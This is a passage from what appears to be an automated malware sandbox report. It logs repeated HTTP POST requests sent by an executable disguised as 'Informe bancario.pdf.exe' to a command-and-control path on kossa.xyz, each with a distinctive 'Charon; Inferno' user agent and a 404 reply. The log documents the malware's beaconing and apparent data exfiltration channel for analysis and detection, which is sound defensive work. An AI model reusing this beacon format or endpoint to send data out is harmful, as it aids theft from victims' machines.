                                  Data Ascii: File not found.


                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                  27192.168.2.349816172.67.154.7280C:\Users\user\Desktop\Informe bancario.pdf.exe
                                  TimestampkBytes transferredDirectionData
                                  Jun 23, 2022 17:55:26.329556942 CEST2012OUTPOST /esi/pp/play.php HTTP/1.0
                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                  Host: kossa.xyz
                                  Accept: */*
                                  Content-Type: application/octet-stream
                                  Content-Encoding: binary
                                  Content-Key: 690A3530
                                  Content-Length: 163
                                  Connection: close
                                  Jun 23, 2022 17:55:26.709573984 CEST2013INHTTP/1.1 404 Not Found
                                  Date: Thu, 23 Jun 2022 15:55:26 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Connection: close
                                  Status: 404 Not Found
                                  CF-Cache-Status: DYNAMIC
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=WMMV0Dl8Wspxba7npT6232CcTfyb%2FKLdRqvKQ8FX2nkMR5DilrH%2FC9o%2BbS5hpPrY7BBkeQjY1WEnkPkTLaZt1oLl3lpNanQlhMp%2BfYG6o%2BPcNqu%2FhHuBz84ConA%3D"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 71fe68719a0e063d-LHR
                                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                  Data Ascii: File not found.


                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                  28192.168.2.349831172.67.154.7280C:\Users\user\Desktop\Informe bancario.pdf.exe
                                  TimestampkBytes transferredDirectionData
                                  Jun 23, 2022 17:55:33.546350956 CEST2647OUTPOST /esi/pp/play.php HTTP/1.0
                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                  Host: kossa.xyz
                                  Accept: */*
                                  Content-Type: application/octet-stream
                                  Content-Encoding: binary
                                  Content-Key: 690A3530
                                  Content-Length: 163
                                  Connection: close
                                  Jun 23, 2022 17:55:33.938213110 CEST2691INHTTP/1.1 404 Not Found
                                  Date: Thu, 23 Jun 2022 15:55:33 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Connection: close
                                  Status: 404 Not Found
                                  CF-Cache-Status: DYNAMIC
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=jUz%2FxTt4iIhJ2PwKINyhFTvj3fDL%2FtQxy7yK4hOYTJZEgvXmXcUwybmZuRWoCmr%2B%2BSCOYt2yJKsyQ%2B5n%2FzDvLj8qUPA%2BLCjB48JsEsZUy8ZrHzGAOf%2BjC3ptrQY%3D"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 71fe689eb8ed74c1-LHR
                                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                  Data Ascii: File not found.


                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                  29192.168.2.349835104.21.40.15380C:\Users\user\Desktop\Informe bancario.pdf.exe
                                  TimestampkBytes transferredDirectionData
                                  Jun 23, 2022 17:55:36.607918024 CEST2772OUTPOST /esi/pp/play.php HTTP/1.0
                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                  Host: kossa.xyz
                                  Accept: */*
                                  Content-Type: application/octet-stream
                                  Content-Encoding: binary
                                  Content-Key: 690A3530
                                  Content-Length: 163
                                  Connection: close
                                  Jun 23, 2022 17:55:36.962721109 CEST2773INHTTP/1.1 404 Not Found
                                  Date: Thu, 23 Jun 2022 15:55:36 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Connection: close
                                  Status: 404 Not Found
                                  CF-Cache-Status: DYNAMIC
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=6bbUVXooaIDaeng5rUL%2BPRXKVBsU3sIVHHZmUwvwtYqyrsEzj1XGev9%2F22vst8zBf4AuCJEevAIPszi07TW8pFOJDFqbk%2F4sPNcdIxI38tFcEI4pJhXdDFVe2x0%3D"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 71fe68b1dce19bd7-FRA
                                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                  Data Ascii: File not found.


                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                  3192.168.2.349744172.67.154.7280C:\Users\user\Desktop\Informe bancario.pdf.exe
                                  TimestampkBytes transferredDirectionData
                                  Jun 23, 2022 17:54:38.472163916 CEST1151OUTPOST /esi/pp/play.php HTTP/1.0
                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                  Host: kossa.xyz
                                  Accept: */*
                                  Content-Type: application/octet-stream
                                  Content-Encoding: binary
                                  Content-Key: 690A3530
                                  Content-Length: 163
                                  Connection: close
                                  Jun 23, 2022 17:54:38.845036030 CEST1152INHTTP/1.1 404 Not Found
                                  Date: Thu, 23 Jun 2022 15:54:38 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Connection: close
                                  Status: 404 Not Found
                                  CF-Cache-Status: DYNAMIC
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=RqbB9AlMckjRfLEXC38HUt8viJ2CR%2FdVWCxsO%2BoHbSN0xpni4oUpMZeSqUIbFeVVkL%2Bs3vYMe6TfFwzCv3eFt4urQt%2BRsoBtSMZHf4OabSRk9sogB2WT1NRzmJw%3D"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 71fe67468dd5066a-LHR
                                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                  Data Ascii: File not found.


                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                  30192.168.2.349836104.21.40.15380C:\Users\user\Desktop\Informe bancario.pdf.exe
                                  TimestampkBytes transferredDirectionData
                                  Jun 23, 2022 17:55:40.617403984 CEST2774OUTPOST /esi/pp/play.php HTTP/1.0
                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                  Host: kossa.xyz
                                  Accept: */*
                                  Content-Type: application/octet-stream
                                  Content-Encoding: binary
                                  Content-Key: 690A3530
                                  Content-Length: 163
                                  Connection: close
                                  Jun 23, 2022 17:55:40.986800909 CEST2775INHTTP/1.1 404 Not Found
                                  Date: Thu, 23 Jun 2022 15:55:40 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Connection: close
                                  Status: 404 Not Found
                                  CF-Cache-Status: DYNAMIC
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ANdlC7UcGEh5m1HTK4j05IcjtMfBzgJh5Bk0%2F1gTeCj7nKEReTxIjP3M27aQCKBZnXI5hpnyapmd7muKDc%2BnHx4CATt8a6shCXMY7iAq5J6iHAUpkuHva6YTDMQ%3D"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 71fe68cae972909a-FRA
                                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                  Data Ascii: File not found.


                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                  31192.168.2.349837104.21.40.15380C:\Users\user\Desktop\Informe bancario.pdf.exe
                                  TimestampkBytes transferredDirectionData
                                  Jun 23, 2022 17:55:42.276335001 CEST2776OUTPOST /esi/pp/play.php HTTP/1.0
                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                  Host: kossa.xyz
                                  Accept: */*
                                  Content-Type: application/octet-stream
                                  Content-Encoding: binary
                                  Content-Key: 690A3530
                                  Content-Length: 163
                                  Connection: close
                                  Jun 23, 2022 17:55:42.633047104 CEST2777INHTTP/1.1 404 Not Found
                                  Date: Thu, 23 Jun 2022 15:55:42 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Connection: close
                                  Status: 404 Not Found
                                  CF-Cache-Status: DYNAMIC
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=vD6qVK3%2FIKCTz3ypf%2B%2BSFPqEGaeZl7P4VwGxW45KkPFK3KKj9oosoyquUmxU%2BFb0QUhS4XVrMZ8KAPc0SQ5bLsTfRyLBMAlicdN5sDAMpCml%2Bo6cPzoVs9qetD0%3D"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 71fe68d539ffbbe3-FRA
                                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                  Data Ascii: File not found.


                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                  32192.168.2.349843104.21.40.15380C:\Users\user\Desktop\Informe bancario.pdf.exe
                                  TimestampkBytes transferredDirectionData
                                  Jun 23, 2022 17:55:45.763231993 CEST10854OUTPOST /esi/pp/play.php HTTP/1.0
                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                  Host: kossa.xyz
                                  Accept: */*
                                  Content-Type: application/octet-stream
                                  Content-Encoding: binary
                                  Content-Key: 690A3530
                                  Content-Length: 163
                                  Connection: close
                                  Jun 23, 2022 17:55:46.128196955 CEST10855INHTTP/1.1 404 Not Found
                                  Date: Thu, 23 Jun 2022 15:55:46 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Connection: close
                                  Status: 404 Not Found
                                  CF-Cache-Status: DYNAMIC
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=S5%2F%2BqadrXgtz7ThItXIn%2BgXfmW6anzeh%2B591CEK9NUq9PUr9xCCDD2rPgsy47qrPKFdFhBQe6aLeBSHsBeHgoMNVGjoH4K3JjgxgTLkwD34Q0h8ZzAgnm%2B0V7c4%3D"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 71fe68eb08ee9968-FRA
                                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                  Data Ascii: File not found.


                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                  33192.168.2.349844172.67.154.7280C:\Users\user\Desktop\Informe bancario.pdf.exe
                                  TimestampkBytes transferredDirectionData
                                  Jun 23, 2022 17:55:50.553164959 CEST10856OUTPOST /esi/pp/play.php HTTP/1.0
                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                  Host: kossa.xyz
                                  Accept: */*
                                  Content-Type: application/octet-stream
                                  Content-Encoding: binary
                                  Content-Key: 690A3530
                                  Content-Length: 163
                                  Connection: close
                                  Jun 23, 2022 17:55:50.924413919 CEST10857INHTTP/1.1 404 Not Found
                                  Date: Thu, 23 Jun 2022 15:55:50 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Connection: close
                                  Status: 404 Not Found
                                  CF-Cache-Status: DYNAMIC
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=hfT0dqYjL9yLERBu%2B0sBFWEaQwB1CFa4P4%2F3gtXP70TXSuvW%2BjG%2FsudrDNG2FZ45zuEl6yORiI%2FR7y0tleWWIsdTKyDDCWQAale%2F6MIiGv811PRy5Lwf4zIJRIg%3D"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 71fe6909096006fd-LHR
                                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                  Data Ascii: File not found.


                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                  34192.168.2.349845172.67.154.7280C:\Users\user\Desktop\Informe bancario.pdf.exe
                                  TimestampkBytes transferredDirectionData
                                  Jun 23, 2022 17:55:53.427871943 CEST10858OUTPOST /esi/pp/play.php HTTP/1.0
                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                  Host: kossa.xyz
                                  Accept: */*
                                  Content-Type: application/octet-stream
                                  Content-Encoding: binary
                                  Content-Key: 690A3530
                                  Content-Length: 163
                                  Connection: close
                                  Jun 23, 2022 17:55:53.809928894 CEST10859INHTTP/1.1 404 Not Found
                                  Date: Thu, 23 Jun 2022 15:55:53 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Connection: close
                                  Status: 404 Not Found
                                  CF-Cache-Status: DYNAMIC
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=U7w7ZObQTczgnUXCgqSSevKrB7lFywSSahWQWOgXL9uCuGP3EUsTbSA6o9En7vWfs3JmQw5s2aWYHUQ62N0Pd%2BTAVL1pub0j5LS%2Fvv2HuOUctIeHAnXDdAde%2FnY%3D"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 71fe691afa2a7759-LHR
                                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                  Data Ascii: File not found.


                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                  35192.168.2.349852172.67.154.7280C:\Users\user\Desktop\Informe bancario.pdf.exe
                                  TimestampkBytes transferredDirectionData
                                  Jun 23, 2022 17:55:55.592533112 CEST12570OUTPOST /esi/pp/play.php HTTP/1.0
                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                  Host: kossa.xyz
                                  Accept: */*
                                  Content-Type: application/octet-stream
                                  Content-Encoding: binary
                                  Content-Key: 690A3530
                                  Content-Length: 163
                                  Connection: close
                                  Jun 23, 2022 17:55:55.968697071 CEST12575INHTTP/1.1 404 Not Found
                                  Date: Thu, 23 Jun 2022 15:55:55 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Connection: close
                                  Status: 404 Not Found
                                  CF-Cache-Status: DYNAMIC
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=rR2Fy%2Bwc4EZFcdXZNOqIPOlDYFTsMbpUIOxIEKz0CCsR6evutYm1eMB79hESwqsLh2DsNHI8jmlVPOt%2FLVnW2cxU6Wtjh0NXEShIlQ3bQ6%2FPC7qTtlsGpBmgkaQ%3D"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 71fe692889f971da-LHR
                                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                  Data Ascii: File not found.


                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                  36192.168.2.349859172.67.154.7280C:\Users\user\Desktop\Informe bancario.pdf.exe
                                  TimestampkBytes transferredDirectionData
                                  Jun 23, 2022 17:55:58.152467966 CEST12585OUTPOST /esi/pp/play.php HTTP/1.0
                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                  Host: kossa.xyz
                                  Accept: */*
                                  Content-Type: application/octet-stream
                                  Content-Encoding: binary
                                  Content-Key: 690A3530
                                  Content-Length: 163
                                  Connection: close
                                  Jun 23, 2022 17:55:58.564342022 CEST12589INHTTP/1.1 404 Not Found
                                  Date: Thu, 23 Jun 2022 15:55:58 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Connection: close
                                  Status: 404 Not Found
                                  CF-Cache-Status: DYNAMIC
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=j2xTysUgyBlv%2BGF%2BfyzX4Pqe81ORHNTjt%2FIAVNurbCNW8c8BnicNZm2P1zchzR43ui4aGlHmPlox69fxKVbfa8IffG%2FUSLJ8z9sptvHtOFCdoOzjVUU%2FRKK8OPM%3D"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 71fe69388842068e-LHR
                                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                  Data Ascii: File not found.


                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                  37192.168.2.349865104.21.40.15380C:\Users\user\Desktop\Informe bancario.pdf.exe
                                  TimestampkBytes transferredDirectionData
                                  Jun 23, 2022 17:56:00.557523966 CEST12598OUTPOST /esi/pp/play.php HTTP/1.0
                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                  Host: kossa.xyz
                                  Accept: */*
                                  Content-Type: application/octet-stream
                                  Content-Encoding: binary
                                  Content-Key: 690A3530
                                  Content-Length: 163
                                  Connection: close
                                  Jun 23, 2022 17:56:00.910413980 CEST12603INHTTP/1.1 404 Not Found
                                  Date: Thu, 23 Jun 2022 15:56:00 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Connection: close
                                  Status: 404 Not Found
                                  CF-Cache-Status: DYNAMIC
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ze9NFrHZ9IrfuGLxpPvBcSsLm0UomgLk8jPtdqquFlynktDCPfbpkVpR%2FYw4hD7WEGv%2B0MUqREfXG6Kk%2Bqj5B0rKQEMEfEOGC4RuR2zK%2F7ISS9%2Fj4ptzO%2FJudJo%3D"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 71fe69478bbf9962-FRA
                                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                  Data Ascii: File not found.


                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                  38192.168.2.349872104.21.40.15380C:\Users\user\Desktop\Informe bancario.pdf.exe
                                  TimestampkBytes transferredDirectionData
                                  Jun 23, 2022 17:56:02.086133957 CEST12614OUTPOST /esi/pp/play.php HTTP/1.0
                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                  Host: kossa.xyz
                                  Accept: */*
                                  Content-Type: application/octet-stream
                                  Content-Encoding: binary
                                  Content-Key: 690A3530
                                  Content-Length: 163
                                  Connection: close
                                  Jun 23, 2022 17:56:02.444869041 CEST12617INHTTP/1.1 404 Not Found
                                  Date: Thu, 23 Jun 2022 15:56:02 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Connection: close
                                  Status: 404 Not Found
                                  CF-Cache-Status: DYNAMIC
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=S1WHOas3vJ7ZFYUp%2FoVVUCVxkbE%2B%2Fp%2B49GWBt85%2By8aInE%2Fgiju3xDMXtJloEZtOOoh0Qkt1%2FZQmQhzHs1QcSgmJ3isNDFUTbBPQR%2BKK%2FfS%2FNBvX4LpQuHNNmZ8%3D"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 71fe69510ec4909d-FRA
                                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                  Data Ascii: File not found.


                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                  39192.168.2.349873172.67.154.7280C:\Users\user\Desktop\Informe bancario.pdf.exe
                                  TimestampkBytes transferredDirectionData
                                  Jun 23, 2022 17:56:04.198158026 CEST12618OUTPOST /esi/pp/play.php HTTP/1.0
                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                  Host: kossa.xyz
                                  Accept: */*
                                  Content-Type: application/octet-stream
                                  Content-Encoding: binary
                                  Content-Key: 690A3530
                                  Content-Length: 163
                                  Connection: close
                                  Jun 23, 2022 17:56:04.571379900 CEST12619INHTTP/1.1 404 Not Found
                                  Date: Thu, 23 Jun 2022 15:56:04 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Connection: close
                                  Status: 404 Not Found
                                  CF-Cache-Status: DYNAMIC
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=omOyIa%2FbwaXPJ05s%2FswmCZgfnEZ7LUKirOKbYW7ZqLOA%2BDqopKYCA80lwyTggiJdFJRy5LHqQXRYDuDGIw%2FBTrZq3IZvAVcLr9l98RagC6y3fNEi8XGjdLs5zR0%3D"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 71fe695e4dcc76c5-LHR
                                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                  Data Ascii: File not found.


                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                  4192.168.2.349745104.21.40.15380C:\Users\user\Desktop\Informe bancario.pdf.exe
                                  TimestampkBytes transferredDirectionData
                                  Jun 23, 2022 17:54:39.886492014 CEST1153OUTPOST /esi/pp/play.php HTTP/1.0
                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                  Host: kossa.xyz
                                  Accept: */*
                                  Content-Type: application/octet-stream
                                  Content-Encoding: binary
                                  Content-Key: 690A3530
                                  Content-Length: 163
                                  Connection: close
                                  Jun 23, 2022 17:54:40.249713898 CEST1154INHTTP/1.1 404 Not Found
                                  Date: Thu, 23 Jun 2022 15:54:40 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Connection: close
                                  Status: 404 Not Found
                                  CF-Cache-Status: DYNAMIC
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=On2%2FpBbJ8An%2FGT14pb6QnHaMiacGEvLWqvhnE5%2FSD4rLjnj6Rg8CaXBDk5x6PgGIs1zw%2F9xQzIw34H4JV5ysx6pavr9OaSBZznt7OiXOPZ7yuub0vKY0I4ucXdc%3D"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 71fe674f5bcf9113-FRA
                                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                  Data Ascii: File not found.


                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                  40192.168.2.349875172.67.154.7280C:\Users\user\Desktop\Informe bancario.pdf.exe
                                  TimestampkBytes transferredDirectionData
                                  Jun 23, 2022 17:56:08.656582117 CEST12624OUTPOST /esi/pp/play.php HTTP/1.0
                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                  Host: kossa.xyz
                                  Accept: */*
                                  Content-Type: application/octet-stream
                                  Content-Encoding: binary
                                  Content-Key: 690A3530
                                  Content-Length: 163
                                  Connection: close
                                  Jun 23, 2022 17:56:09.034661055 CEST12625INHTTP/1.1 404 Not Found
                                  Date: Thu, 23 Jun 2022 15:56:09 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Connection: close
                                  Status: 404 Not Found
                                  CF-Cache-Status: DYNAMIC
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=OxjygSRG8X%2FkV9bKGg9vKcukGQQMsZciUlD4EA%2FbKAdKhbAsUZHriNrmaDnwEjlvhCO2v0dr40IU6hwQz7EKgiICOz%2FwZ8BGMfZL6ripgHen%2FVFAblBWSK3ZE5M%3D"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 71fe697a2bb27774-LHR
                                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                  Data Ascii: File not found.


                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                  41192.168.2.349876104.21.40.15380C:\Users\user\Desktop\Informe bancario.pdf.exe
                                  TimestampkBytes transferredDirectionData
                                  Jun 23, 2022 17:56:11.073086023 CEST12626OUTPOST /esi/pp/play.php HTTP/1.0
                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                  Host: kossa.xyz
                                  Accept: */*
                                  Content-Type: application/octet-stream
                                  Content-Encoding: binary
                                  Content-Key: 690A3530
                                  Content-Length: 163
                                  Connection: close
                                  Jun 23, 2022 17:56:11.421587944 CEST12627INHTTP/1.1 404 Not Found
                                  Date: Thu, 23 Jun 2022 15:56:11 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Connection: close
                                  Status: 404 Not Found
                                  CF-Cache-Status: DYNAMIC
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=vKWHn%2FyKZfK22jYwkSiqKJ3lNebyDNlMqc2uTH%2FWPL1CsEeS2wXJq7O8RBu3uo9kCAL4JgpjGnEOG2LPOeL7%2BiITMPF9gEE91z1aYp%2FlObWTDWMy78vsHq6Twg0%3D"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 71fe698938c9903a-FRA
                                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                  Data Ascii: File not found.


                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                  42192.168.2.349877172.67.154.7280C:\Users\user\Desktop\Informe bancario.pdf.exe
                                  TimestampkBytes transferredDirectionData
                                  Jun 23, 2022 17:56:13.789082050 CEST12628OUTPOST /esi/pp/play.php HTTP/1.0
                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                  Host: kossa.xyz
                                  Accept: */*
                                  Content-Type: application/octet-stream
                                  Content-Encoding: binary
                                  Content-Key: 690A3530
                                  Content-Length: 163
                                  Connection: close
                                  Jun 23, 2022 17:56:14.167265892 CEST12629INHTTP/1.1 404 Not Found
                                  Date: Thu, 23 Jun 2022 15:56:14 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Connection: close
                                  Status: 404 Not Found
                                  CF-Cache-Status: DYNAMIC
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ndR9ZCTJ1N11vjX%2Fx0YEz6iEdBcRwRBrFLR63RkojfAusVr7m8LQjcOnDZVKgChgIGzkLUZ6xRoemhHdLPRFdThTivALoGspyfOiDAiawxUfm5e3PqNs0e6Xj8o%3D"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 71fe699a38fd8926-LHR
                                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                  Data Ascii: File not found.


                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                  43192.168.2.349881104.21.40.15380C:\Users\user\Desktop\Informe bancario.pdf.exe
                                  TimestampkBytes transferredDirectionData
                                  Jun 23, 2022 17:56:16.928508997 CEST12638OUTPOST /esi/pp/play.php HTTP/1.0
                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                  Host: kossa.xyz
                                  Accept: */*
                                  Content-Type: application/octet-stream
                                  Content-Encoding: binary
                                  Content-Key: 690A3530
                                  Content-Length: 163
                                  Connection: close
                                  Jun 23, 2022 17:56:17.284101009 CEST12640INHTTP/1.1 404 Not Found
                                  Date: Thu, 23 Jun 2022 15:56:17 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Connection: close
                                  Status: 404 Not Found
                                  CF-Cache-Status: DYNAMIC
